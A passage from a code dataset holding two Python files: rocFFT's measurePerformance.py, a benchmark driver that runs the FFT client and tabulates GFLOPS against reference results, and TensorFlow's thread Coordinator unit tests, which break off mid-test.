source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
measurePerformance.py | #!/usr/bin/env python
# #############################################################################
# Copyright (c) 2013 - present Advanced Micro Devices, Inc. All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
# #############################################################################
import sys
import argparse
import subprocess
import itertools
import re
import os
import math
from threading import Timer, Thread
import thread, time
from platform import system
import numpy as np
from datetime import datetime
import errorHandler
from fftPerformanceTesting import *
from performanceUtility import timeout, log, generate235Radices
#Todo list:
# - more error handling
# - more tests for relative path
TIMOUT_VAL = 900 #In seconds
WARNING_LOG_MAX_ENTRY = 500
MIN_GFLOPS_TO_COMPARE = 10
MAX_RERUN_NUM = 128
#layoutvalues = ['cp', 'ci']
placevalues = ['in', 'out']
precisionvalues = ['single', 'double']
pow10 = '1-9,10-90:10,100-900:100,1000-9000:1000,10000-90000:10000,100000-900000:100000,1000000-9000000:1000000'
parser = argparse.ArgumentParser(description='Measure performance of the rocFFT library')
parser.add_argument('--device',
dest='device', default='0',
help='device(s) to run on; may be a comma-delimited list. choices are (default gpu)')
parser.add_argument('-b', '--batchsize',
dest='batchSize', default='1',
help='number of FFTs to perform with one invocation of the client. the special value \'adapt\' may be used to adjust the batch size on a per-transform basis to the maximum problem size possible on the device. (default 1)'.format(pow10))
parser.add_argument('-a', '--adaptivemax',
dest='constProbSize', default='-1',
help='Max problem size that you want to maintain across the invocations of client with different lengths. This is adaptive and adjusts itself automtically.'.format(pow10))
parser.add_argument('-x', '--lengthx',
dest='lengthx', default='1',
help='length(s) of x to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,2048-32768 (default 1)')
parser.add_argument('-y', '--lengthy',
dest='lengthy', default='1',
help='length(s) of y to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,32768 (default 1)')
parser.add_argument('-z', '--lengthz',
dest='lengthz', default='1',
help='length(s) of z to test; must be factors of 1, 2, 3, or 5 with rocFFT; may be a range or a comma-delimited list. e.g., 16-128 or 1200 or 16,32768 (default 1)')
parser.add_argument('-reps',
dest='reps', default='10',
help='Number of repetitions (default 10)')
parser.add_argument('-prime_factor', '--prime_factor',
dest='prime_factor', default='2',
help='only test the prime factors within the specified range of lengthx/y/z. Select from 2,3,5, and 7. Example: -prime_factor 2,3')
parser.add_argument('-test_count', '--test_count',
dest='test_count', default='100',
help='Number of tests to perform')
parser.add_argument('--problemsize',
dest='problemsize', default=None)
# help='additional problems of a set size. may be used in addition to lengthx/y/z. each indicated problem size will be added to the list of FFTs to perform. should be entered in AxBxC:D format. A, B, and C indicate the sizes of the X, Y, and Z dimensions (respectively). D is the batch size. All values except the length of X are optional. may enter multiple in a comma-delimited list. e.g., 2x2x2:32768 or 256x256:100,512x512:256')
parser.add_argument('-i', '--inputlayout',
dest='inputlayout', default='0',
help=' 0. interleaved (default) 1. planar 2. real 3. hermitian interleaved 4. hermitian planar' )
parser.add_argument('-o', '--outputlayout',
dest='outputlayout', default='0',
help=' 0. interleaved (default) 1. planar 2. real 3. hermitian interleaved 4. hermitian planar' )
parser.add_argument('--placeness',
dest='placeness', default='in',
help='Choices are ' + str(placevalues) + '. in = in place, out = out of place (default in)')
parser.add_argument('-r', '--precision',
dest='precision', default='single',
help='Choices are ' + str(precisionvalues) + '. (default single)')
parser.add_argument('--label',
dest='label', default=None,
help='a label to be associated with all transforms performed in this run. if LABEL includes any spaces, it must be in \"double quotes\". note that the label is not saved to an .ini file. e.g., --label cayman may indicate that a test was performed on a cayman card or --label \"Windows 32\" may indicate that the test was performed on Windows 32')
parser.add_argument('--ref-file',
dest='refFilename', default=None,
help='The reference results file to compare with.')
parser.add_argument('--ref-tol',
dest='refTol', default='0.05',
help='The reference gflops tolerance, default 5%%.')
parser.add_argument('--tablefile',
dest='tableOutputFilename', default=None,
help='save the results to a plaintext table with the file name indicated. this can be used with plotPerformance.py to generate graphs of the data (default: table prints to screen)')
parser.add_argument('--mute', action="store_true", help='no print')
parser.add_argument('--client-prefix',
dest='client_prefix', default='./',
help='Path where the library client is located (default current directory)')
parser.add_argument('--rerun',
dest='rerun', default=None,
help='rerun test from *.csv result file')
args = parser.parse_args()
label = str(args.label)
# todo: change the log dir, especially for rerun case
if not os.path.exists('perfLog'):
os.makedirs('perfLog')
logfile = os.path.join('perfLog', (label+'-'+'fftMeasurePerfLog.txt'))
def printLog(txt):
if not args.mute:
print txt
log(logfile, txt)
printLog("=========================MEASURE PERFORMANCE START===========================")
printLog("Process id of Measure Performance:"+str(os.getpid()))
currCommandProcess = None
rerun_args = ''
rerun_index = -1
rerun_file = str(args.rerun)
if args.rerun:
if (not rerun_file) or (not os.path.isfile(rerun_file)):
printLog('ERROR: invalid file/path for --rerun option.')
quit()
else:
with open(rerun_file, 'r') as input:
for line in input:
if line.startswith('#Cmd:'):
rerun_args = line.strip().split('.py')[1] #todo: better err handling
rerun_args = rerun_args.strip().split(' ')
break
if not "--tablefile" in rerun_args :
printLog('ERROR: --rerun option, need explicitly specified --tablefile file.')
quit()
for i in range(MAX_RERUN_NUM):
next_file = rerun_file[:-4] + "_r" + str(i) + ".csv" #support csv file only for now
if not os.path.isfile(next_file):
rerun_args = [arg.replace(rerun_file, next_file) for arg in rerun_args]
#print rerun_args
args = parser.parse_args(rerun_args)
args.label = os.path.basename(next_file)[:-4]
rerun_index = i
break
if i >= MAX_RERUN_NUM-1:
printLog('ERROR: --rerun option, too many files.')
quit()
args.library = 'rocFFT'
if args.tableOutputFilename != None and args.refFilename != None:
if args.tableOutputFilename == args.refFilename:
printLog('ERROR: tablefile and ref-file are the same.')
quit()
printLog('Executing measure performance for label: '+str(label))
#This function is defunct now
@timeout(1, "fileName") # timeout is 5 minutes, 5*60 = 300 secs
def checkTimeOutPut2(args):
global currCommandProcess
#ret = subprocess.check_output(args, stderr=subprocess.STDOUT)
#return ret
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
printLog("Curr Command Process id = "+str(currCommandProcess.pid))
ret = currCommandProcess.communicate()
if(ret[0] == None or ret[0] == ''):
errCode = currCommandProcess.poll()
raise subprocess.CalledProcessError(errCode, args, output=ret[1])
return ret[0]
#Spawns a separate thread to execute the library command and wait for that thread to complete
#This wait is of 900 seconds (15 minutes). If still the thread is alive then we kill the thread
def checkTimeOutPut(args):
t = None
global currCommandProcess
global stde
global stdo
stde = None
stdo = None
def executeCommand():
global currCommandProcess
global stdo
global stde
try:
stdo, stde = currCommandProcess.communicate()
printLog('stdout:\n'+str(stdo).replace('\n', '\n '))
printLog('stderr:\n'+str(stde).replace('\n', '\n '))
except:
printLog("ERROR: UNKNOWN Exception - +checkWinTimeOutPut()::executeCommand()")
currCommandProcess = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE,shell=True)
thread = Thread(target=executeCommand)
thread.start()
thread.join(TIMOUT_VAL) #wait for the thread to complete
if thread.is_alive():
printLog('ERROR: Killing the process - terminating thread because it is taking too much of time to execute')
currCommandProcess.kill()
printLog('ERROR: Timed out exception')
raise errorHandler.ApplicationException(__file__, errorHandler.TIME_OUT)
if stdo == "" or stdo==None:
errCode = currCommandProcess.poll()
printLog('ERROR: @@@@@Raising Called processor exception')
raise subprocess.CalledProcessError(errCode, args, output=stde)
return stdo
#turn pow10 into its range list
if args.batchSize.count('pow10'):
args.batchSize = pow10
#split up comma-delimited lists
args.batchSize = args.batchSize.split(',')
args.constProbSize = int(args.constProbSize.split(',')[0])
args.device = args.device.split(',')
args.lengthx = args.lengthx.split(',')
args.lengthy = args.lengthy.split(',')
args.lengthz = args.lengthz.split(',')
args.prime_factor = args.prime_factor.split(',')
if args.problemsize:
args.problemsize = args.problemsize.split(',')
args.inputlayout = args.inputlayout.split(',')
args.outputlayout = args.outputlayout.split(',')
args.placeness = args.placeness.split(',')
args.precision = args.precision.split(',')
printLog('Executing for label: '+str(args.label))
#check parameters for sanity
# batchSize of 'max' must not be in a list (does not get on well with others)
#if args.batchSize.count('max') and len(args.batchSize) > 1:
if ( args.batchSize.count('max') or args.batchSize.count('adapt') )and len(args.batchSize) > 1:
printLog('ERROR: --batchsize max must not be in a comma delimited list')
quit()
# in case of an in-place transform, input and output layouts must be the same (otherwise: *boom*)
#for n in args.placeness:
# if n == 'in' or n == 'inplace':
# if len(args.inputlayout) > 1 or len(args.outputlayout) > 1 or args.inputlayout[0] != args.outputlayout[0]:
# printLog('ERROR: if transformation is in-place, input and output layouts must match')
# quit()
# check for valid values in precision
for n in args.precision:
if n != 'single' and n != 'double':
printLog('ERROR: invalid value for precision')
quit()
def isPrime(n):
import math
n = abs(n)
i = 2
while i <= math.sqrt(n):
if n%i == 0:
return False
i += 1
return True
def findFactors(number):
iter_space = range(1, number+1)
prime_factor_list = []
for curr_iter in iter_space:
if isPrime(curr_iter) == True:
#print 'curr_iter_prime: ', curr_iter
if number%curr_iter == 0:
prime_factor_list.append(curr_iter)
return prime_factor_list
#Type : Function
#Input: num, a number which we need to factorize
#Return Type: list
#Details: This function returns only the prime factors on an input number
# e.g: input: 20, returns: [2,2,5]
# input: 32, returns: [2,2,2,2,2]
def factor(num):
if num == 1:
return [1]
i = 2
limit = num**0.5
while i <= limit:
if num % i == 0:
ret = factor(num/i)
ret.append(i)
return ret
i += 1
return [num]
def validateFactors(flist):
ref_list = [1,2,3,5]
if flist==ref_list:
return True
if len(flist) > len(ref_list):
return False
for felement in flist:
if ref_list.count(felement) != 1:
return False
return True
#Type : Function
#Input: num, a number which we need to validate for 1,2,3 or 5 factors
#Return Type: boolean
#Details: This function validates an input number for its prime factors
# If factors has number other than 1,2,3 or 5 then return false else return true
# e.g: input: 20, returns: True
# input: 28, returns: False
def validate_number_for_1235(num):
if num == 0:
return True
set1235 = set([1,2,3,5])
setPrimeFactors = set(factor(num))
setPrimeFactors = setPrimeFactors | set1235 #performed union of two sets
#if still the sets are same then we are done!!!
#else we got few factors other than 1,2,3 or 5 and we should invalidate
#the input number
if setPrimeFactors == set1235:
return True
return False
def getValidNumbersInRange(rlist):
valid_number_list = []
for relement in rlist:
prime_factors = findFactors(relement)
if validateFactors(prime_factors) == True:
valid_number_list.append(relement)
return valid_number_list
def get_next_num_with_1235_factors(start):
start+=1
while not validateFactors(findFactors(start)):
start+=1
return start
def check_number_for_1235_factors(number):
#printLog('number:'+ number)
factors = findFactors(number)
#printLog('factors:'+ factors)
if not validateFactors(factors):
printLog("ERROR: --{0} must have only 1,2,3,5 as factors")
return False
return True
def check_for_1235_factors(values, option):
#print 'values: ', values
for n in values:
for m in n.replace('-',',').split(','):
if not validate_number_for_1235(int(m)):
print 'ERROR: --{0} must specify number with only 1,2,3,5 as factors'.format(option)
quit()
#print 'Valid number for :',option,':', m
if args.library == 'rocFFT':
check_for_1235_factors(args.lengthx, 'lengthx')
check_for_1235_factors(args.lengthy, 'lengthy')
check_for_1235_factors(args.lengthz, 'lengthz')
if not os.path.isfile(args.client_prefix+executable(args.library)):
printLog("ERROR: Could not find client named {0}".format(executable(args.library)))
quit()
def get235RadicesNumberInRange(minimum, maximum):
if minimum == 0 and maximum == 0:
return [0]
numbers = generate235Radices(maximum)
minIndex = numbers.index(minimum)
maxIndex = numbers.index(maximum)
return numbers[minIndex:maxIndex+1]
#expand ranges
class Range:
def __init__(self, ranges, defaultStep='+1'):
self.expanded = []
for thisRange in ranges:
if thisRange != 'max' and thisRange != 'adapt' :
if thisRange.count(':'):
self._stepAmount = thisRange.split(':')[1]
else:
self._stepAmount = defaultStep
thisRange = thisRange.split(':')[0]
if self._stepAmount.count('x'):
self._stepper = '_mult'
self._stepAmount = self._stepAmount.lstrip('+x')
self._stepAmount = int(self._stepAmount)
elif self._stepAmount.count('l'):
self._stepper = '_next_num_with_1235_factor'
self._stepAmount = 0
else:
self._stepper = '_add'
self._stepAmount = self._stepAmount.lstrip('+x')
self._stepAmount = int(self._stepAmount)
if thisRange.count('-'):
self.begin = int(thisRange.split('-')[0])
self.end = int(thisRange.split('-')[1])
else:
self.begin = int(thisRange.split('-')[0])
self.end = int(thisRange.split('-')[0])
self.current = self.begin
# _thisRangeExpanded = []
if thisRange == 'max':
self.expanded = self.expanded + ['max']
elif thisRange == 'adapt':
self.expanded = self.expanded + ['adapt']
elif self.begin == 0 and self._stepper == '_mult':
self.expanded = self.expanded + [0]
else:
if self._stepper == '_next_num_with_1235_factor':
self.expanded = self.expanded + get235RadicesNumberInRange(self.current, self.end)
else:
while self.current <= self.end:
self.expanded = self.expanded + [self.current]
self._step()
# now we want to uniquify and sort the expanded range
self.expanded = list(set(self.expanded))
self.expanded.sort()
# advance current value to next
def _step(self):
getattr(self, self._stepper)()
def _mult(self):
self.current = self.current * self._stepAmount
def _add(self):
self.current = self.current + self._stepAmount
def _next_num_with_1235_factor(self):
self.current = get_next_num_with_1235_factors(self.current)
args.batchSize = Range(args.batchSize).expanded
args.lengthx = Range(args.lengthx, 'l').expanded
args.lengthy = Range(args.lengthy, 'l').expanded
args.lengthz = Range(args.lengthz, 'l').expanded
def create_prime_factors(args,input_list):
powers2=[1]
powers3=[1]
powers5=[1]
powers7=[1]
if '2' in args.prime_factor:
powers2+=[2**x for x in range(1,int(math.floor(math.log(max(input_list),2)+1)))]
if '3' in args.prime_factor:
powers3+=[3**x for x in range(1,int(math.floor(math.log(max(input_list),3)+1)))]
if '5' in args.prime_factor:
powers5+=[5**x for x in range(1,int(math.floor(math.log(max(input_list),5)+1)))]
if '7' in args.prime_factor:
powers7+=[7**x for x in range(1,int(math.floor(math.log(max(input_list),7)+1)))]
xlist=[]
for i in powers2:
for j in powers3:
for k in powers5:
for l in powers7:
dummy=int(i)*int(j)*int(k)*int(l)
if(dummy<=max(input_list)) and (dummy>=min(input_list)):
xlist.append(dummy)
xlist=sorted(xlist)
xlist=xlist[:int(args.test_count)] #snafu
return xlist
args.lengthx=create_prime_factors(args,args.lengthx)
args.lengthy=create_prime_factors(args,args.lengthy)
args.lengthz=create_prime_factors(args,args.lengthz)
#expand problemsizes ('XxYxZ:batch')
#print "args.problemsize--1-->", args.problemsize
if args.problemsize and args.problemsize[0] != 'None':
i = 0
while i < len(args.problemsize):
args.problemsize[i] = args.problemsize[i].split(':')
args.problemsize[i][0] = args.problemsize[i][0].split('x')
i = i+1
#create the problem size combinations for each run of the client
# A: This part creats a product of all possible combinations. Too many cases in 2/3D
#problem_size_combinations = itertools.product(args.lengthx, args.lengthy, args.lengthz, args.batchSize)
#problem_size_combinations = list(itertools.islice(problem_size_combinations, None))
if args.lengthy[0]==1:
args.lengthy=[1]*len(args.lengthx)
if args.lengthz[0]==1:
args.lengthz=[1]*len(args.lengthx)
dummy=[args.batchSize[0]]*len(args.lengthx)
problem_size_combinations=zip(args.lengthx,args.lengthy,args.lengthz,dummy)
#print "args.problemsize--2-->", args.problemsize
#add manually entered problem sizes to the list of FFTs to crank out
manual_test_combinations = []
if args.problemsize and args.problemsize[0] != 'None':
for n in args.problemsize:
x = []
y = []
z = []
batch = []
x.append(int(n[0][0]))
if len(n[0]) >= 2:
y.append(int(n[0][1]))
else:
y.append(1)
if len(n[0]) >= 3:
z.append(int(n[0][2]))
else:
z.append(1)
if len(n) > 1:
batch.append(int(n[1]))
else:
batch.append(1)
combos = itertools.product(x, y, z, batch)
combos = list(itertools.islice(combos, None))
for n in combos:
manual_test_combinations.append(n)
# manually entered problem sizes should not be plotted (for now). they may still be output in a table if requested
problem_size_combinations = problem_size_combinations + manual_test_combinations
#create final list of all transformations (with problem sizes and transform properties)
test_combinations = itertools.product(problem_size_combinations, args.device, args.inputlayout, args.outputlayout, args.placeness, args.precision)
test_combinations = list(itertools.islice(test_combinations, None))
test_combinations = [TestCombination(params[0][0], params[0][1], params[0][2], params[0][3], params[1], params[2], params[3], params[4], params[5], args.label) for params in test_combinations]
#print("lenghtx= ",test_combinations[0].x)
#print("lenghty= ",test_combinations[0].y)
#print("lenghtz= ",test_combinations[0].z)
#print("placeness= ",test_combinations[0].placeness)
#turn each test combination into a command, run the command, and then stash the gflops
gflops_result = [] # this is where we'll store the results for the table
#open output file and write the header
if args.tableOutputFilename == None:
args.tableOutputFilename = 'rocFFT_' + 'x_'+ str(args.lengthx[0]) + '_y_'+str(args.lengthy[0])+'_z_'+str(args.lengthz[0])+'_'+str(args.precision[0])+ '_'+datetime.now().isoformat().replace(':','.') + '.txt'
else:
if os.path.isfile(args.tableOutputFilename):
oldname = args.tableOutputFilename
args.tableOutputFilename = args.tableOutputFilename + datetime.now().isoformat().replace(':','.')
message = 'A file with the name ' + oldname + ' already exists. Changing filename to ' + args.tableOutputFilename
printLog(message)
printLog('table header---->'+ str(tableHeader))
table = open(args.tableOutputFilename, 'w')
table.write('#Do not change any content of this file except adding comments!!!\n')
table.write('#\n')
table.write('#Timestamp: ' + str(datetime.now()) + '\n')
table.write('#\n')
if rerun_args:
table.write('#From --rerun\n')
table.write('#Cmd: python ' + str(sys.argv[0]) + ' ' + str(' '.join(rerun_args)) + '\n')
else:
table.write('#Cmd: python ' + str(' '.join(sys.argv)) + '\n')
table.write('#\n')
table.write(tableHeader + '\n')
table.flush()
if args.constProbSize == -1:
args.constProbSize = maxBatchSize(1, 1, 1, args.inputlayout[0], args.precision[0], '-' + args.device[0])
args.constProbSize = int(args.constProbSize)
printLog('Total combinations = '+str(len(test_combinations)))
vi = 0
for params in test_combinations:
if vi>=int(args.test_count):
break
vi = vi+1
printLog("-----------------------------------------------------")
printLog('preparing command: '+ str(vi))
device = params.device
lengthx = str(params.x)
lengthy = str(params.y)
lengthz = str(params.z)
inlayout=str(params.inlayout)
outlayout=str(params.outlayout)
client_prefix=str(args.client_prefix)
if params.batchsize == 'max':
batchSize = maxBatchSize(lengthx, lengthy, lengthz, params.inlayout, params.precision, '-' + device)
elif params.batchsize == 'adapt':
batchSize = str(args.constProbSize/(int(lengthx)*int(lengthy)*int(lengthz)))
else:
batchSize = str(params.batchsize)
if params.placeness == 'inplace' or params.placeness == 'in':
placeness = ''
elif params.placeness == 'outofplace' or params.placeness == 'out':
placeness = '-o'
else:
printLog('ERROR: invalid value for placeness when assembling client command')
if params.precision == 'single':
precision = ''
elif params.precision == 'double':
precision = '--double'
else:
printLog('ERROR: invalid value for precision when assembling client command')
transformType = '0'
if (inlayout == '2' and (outlayout == '3' or outlayout == '4')):
transformType = '2'
elif (outlayout == '2' and (inlayout == '3' or outlayout == '4')):
transformType = '3'
#set up arguments here
arguments = [client_prefix+ executable(args.library),
'--device ' + device,
'-x', lengthx,
'-y', lengthy,
'-z', lengthz,
'--batchSize', batchSize,
'-t', transformType,
'--inArrType', inlayout,
'--outArrType',outlayout,
placeness,
precision,
'-p', args.reps]
writeline = True
try:
arguments=' '.join(arguments)
printLog('Executing Command: '+str(arguments))
output = checkTimeOutPut(arguments)
output = output.split(os.linesep);
printLog('Execution Successfull\n')
except errorHandler.ApplicationException as ae:
writeline = False
printLog('ERROR: Command is taking too much of time '+ae.message+'\n'+'Command: \n'+str(arguments))
continue
except subprocess.CalledProcessError as clientCrash:
print 'Command execution failure--->'
writeline = False
printLog('ERROR: client crash. Please report the following error message (with rocFFT error code, if given, and the parameters used to invoke measurePerformance.py) \n'+clientCrash.output+'\n')
printLog('IN ORIGINAL WE CALL QUIT HERE - 1\n')
continue
for x in output:
if x.count('out of memory'):
writeline = False
printLog('ERROR: Omitting line from table - problem is too large')
printLog('ERROR: Omitting line from table - problem is too large')
if writeline:
try:
output = itertools.ifilter( lambda x: x.count('gflops'), output)
output = list(itertools.islice(output, None))
thisResult = re.search('\d+\.*\d*e*-*\d*$', output[-1])
thisResult = float(thisResult.group(0))
gflops_result.append(thisResult)
thisResult = ('{:11d}'.format(params.x), '{:11d}'.format(params.y), '{:11d}'.format(params.z),\
'{:>11s}'.format(batchSize), '{:>7s}'.format(params.device), \
'{:>6s}'.format(params.inlayout), '{:>7s}'.format(params.outlayout), \
'{:>6s}'.format(params.placeness), '{:>10s}'.format(params.precision), \
'{:>12s}'.format(params.label), '{:>11.3f}'.format(thisResult))
outputRow = ''
for x in thisResult:
outputRow = outputRow + str(x) + ','
#outputRow = outputRow.rstrip(',')
table.write(outputRow + '\n')
table.flush()
except:
printLog('ERROR: Exception occurs in GFLOP parsing')
else:
if(len(output) > 0):
if output[0].find('nan') or output[0].find('inf'):
printLog( 'WARNING: output from client was funky for this run. skipping table row')
else:
prinLog('ERROR: output from client makes no sense')
printLog(str(output[0]))
printLog('IN ORIGINAL WE CALL QUIT HERE - 2\n')
else:
prinLog('ERROR: output from client makes no sense')
#quit()
if args.refFilename != None:
printLog("-----------------------------------------------------")
printLog("Enabled reference comparison")
refResults = open(args.refFilename, 'r')
refResultsContents = refResults.read()
refResultsContents = refResultsContents.rstrip().split('\n')
raw_data = []
for line in refResultsContents:
if not (line.startswith('#') or len(line.strip()) == 0):
raw_data.append(line.split('#')[0].rstrip(', '))
printLog(" index"+str(tableHeader).replace(" GFLOPS", " GFLOPS ref vs tested relative_err"))
failedCount = 0
totalCount = len(gflops_result)
for idx, row in enumerate(raw_data):
ref_gflops = float(row[row.rfind(',')+1:]) # assume the last col is GFLOPS
if (idx < totalCount and np.less(MIN_GFLOPS_TO_COMPARE, ref_gflops) ):
if np.less(gflops_result[idx], ref_gflops):
relative_error = abs(ref_gflops - gflops_result[idx])/gflops_result[idx]
if np.greater(relative_error, float(args.refTol)):
printLog("Warning: " + '{:>6d}'.format(idx+1) + row +
"," + '{:>11.3f}'.format(gflops_result[idx]) +
"," + '{:12.2%}'.format(-relative_error))
failedCount+=1
if failedCount>= WARNING_LOG_MAX_ENTRY:
printLog("Too many failed cases...")
break
printLog("\nTotal number of samples " + str(totalCount) +
", passing rate " + '{:.2%}'.format((totalCount-failedCount)/totalCount) +
", with tolerance " + '{:.2%}'.format(float(args.refTol)))
if rerun_args:
printLog("-----------------------------------------------------")
printLog("Rerun auto plotting...")
plot_output_file = ''
plot_cmd = "python plotPerformance.py -x x -y gflops -d " + rerun_file
if rerun_index > -1:
for i in range(rerun_index+1):
next_file = rerun_file[:-4] + "_r" + str(i) + ".csv" #support csv file only for now
if os.path.isfile(next_file):
plot_cmd += " -d " + next_file
if i == rerun_index:
plot_output_file = next_file.replace(".csv", ".png")
plot_cmd += " --outputfile " + plot_output_file
subprocess.check_call(plot_cmd, shell=True)
printLog("Plotted to file " + plot_output_file + '.')
printLog("=========================MEASURE PERFORMANCE ENDS===========================\n")
|
coordinator_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Coordinator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import threading
import time
from tensorflow.python.framework import errors_impl
from tensorflow.python.platform import test
from tensorflow.python.training import coordinator
def StopOnEvent(coord, wait_for_stop, set_when_stopped):
wait_for_stop.wait()
coord.request_stop()
set_when_stopped.set()
def RaiseOnEvent(coord, wait_for_stop, set_when_stopped, ex, report_exception):
try:
wait_for_stop.wait()
raise ex
except RuntimeError as e:
if report_exception:
coord.request_stop(e)
else:
coord.request_stop(sys.exc_info())
finally:
if set_when_stopped:
set_when_stopped.set()
def RaiseOnEventUsingContextHandler(coord, wait_for_stop, set_when_stopped, ex):
with coord.stop_on_exception():
wait_for_stop.wait()
raise ex
if set_when_stopped:
set_when_stopped.set()
def SleepABit(n_secs, coord=None):
if coord:
coord.register_thread(threading.current_thread())
time.sleep(n_secs)
def WaitForThreadsToRegister(coord, num_threads):
while True:
with coord._lock:
if len(coord._registered_threads) == num_threads:
break
time.sleep(0.001)
class CoordinatorTest(test.TestCase):
def testStopAPI(self):
coord = coordinator.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
coord.request_stop()
self.assertTrue(coord.should_stop())
self.assertTrue(coord.wait_for_stop(0.01))
def testStopAsync(self):
coord = coordinator.Coordinator()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.1))
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
t = threading.Thread(
target=StopOnEvent, args=(coord, wait_for_stop_ev, has_stopped_ev))
t.start()
self.assertFalse(coord.should_stop())
self.assertFalse(coord.wait_for_stop(0.01))
wait_for_stop_ev.set()
has_stopped_ev.wait()
self.assertTrue(coord.wait_for_stop(0.05))
self.assertTrue(coord.should_stop())
def testJoin(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01,)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01,))
]
for t in threads:
t.start()
coord.join(threads)
for t in threads:
self.assertFalse(t.is_alive())
def testJoinAllRegistered(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02, coord)),
threading.Thread(target=SleepABit, args=(0.01, coord))
]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 3)
coord.join()
for t in threads:
self.assertFalse(t.is_alive())
def testJoinSomeRegistered(self):
coord = coordinator.Coordinator()
threads = [
threading.Thread(target=SleepABit, args=(0.01, coord)),
threading.Thread(target=SleepABit, args=(0.02,)),
threading.Thread(target=SleepABit, args=(0.01, coord))
]
for t in threads:
t.start()
WaitForThreadsToRegister(coord, 2)
# threads[1] is not registered we must pass it in.
coord.join([threads[1]])
for t in threads:
self.assertFalse(t.is_alive())
def testJoinGraceExpires(self):
def TestWithGracePeriod(stop_grace_period):
coord = coordinator.Coordinator()
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
threads = [
threading.Thread(
target=StopOnEvent,
args=(coord, wait_for_stop_ev, has_stopped_ev)),
threading.Thread(target=SleepABit, args=(10.0,))
]
for t in threads:
t.daemon = True
t.start()
wait_for_stop_ev.set()
has_stopped_ev.wait()
with self.assertRaisesRegexp(RuntimeError, "threads still running"):
coord.join(threads, stop_grace_period_secs=stop_grace_period)
TestWithGracePeriod(1e-10)
TestWithGracePeriod(0.002)
TestWithGracePeriod(1.0)
def testJoinWithoutGraceExpires(self):
coord = coordinator.Coordinator()
wait_for_stop_ev = threading.Event()
has_stopped_ev = threading.Event()
threads = [
threading.Thread(
target=StopOnEvent, args=(coord, wait_for_stop_ev, has_stopped_ev)),
threading.Thread(target=SleepABit, args=(10.0,))
]
for t in threads:
t.daemon = True
t.start()
wait_for_stop_ev.set()
has_stopped_ev.wait()
coord.join(threads, stop_grace_period_secs=1., ignore_live_threads=True)
def testJoinRaiseReportExcInfo(self):
coord = coordinator.Coordinator()
ev_1 = threading.Event()
ev_2 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, ev_2, RuntimeError("First"), False)),
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_2, None, RuntimeError("Too late"), False))
]
for t in threads:
t.start()
ev_1.set()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinRaiseReportException(self):
coord = coordinator.Coordinator()
ev_1 = threading.Event()
ev_2 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, ev_2, RuntimeError("First"), True)),
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_2, None, RuntimeError("Too late"), True))
]
for t in threads:
t.start()
ev_1.set()
with self.assertRaisesRegexp(RuntimeError, "First"):
coord.join(threads)
def testJoinIgnoresOutOfRange(self):
coord = coordinator.Coordinator()
ev_1 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, None,
errors_impl.OutOfRangeError(None, None, "First"), True))
]
for t in threads:
t.start()
ev_1.set()
coord.join(threads)
def testJoinIgnoresMyExceptionType(self):
coord = coordinator.Coordinator(clean_stop_exception_types=(ValueError,))
ev_1 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEvent,
args=(coord, ev_1, None, ValueError("Clean stop"), True))
]
for t in threads:
t.start()
ev_1.set()
coord.join(threads)
def testJoinRaiseReportExceptionUsingHandler(self):
coord = coordinator.Coordinator()
ev_1 = threading.Event()
ev_2 = threading.Event()
threads = [
threading.Thread(
target=RaiseOnEventUsingContextHandler,
args=(coord, ev_1, ev_2, RuntimeError("First"))),
threading.Thread(
target=RaiseOnEventUsingContextHandler,
args=(coord, ev_2, None, RuntimeError("Too late")))
]
for t in threads:
t.start()
ev_1.set()
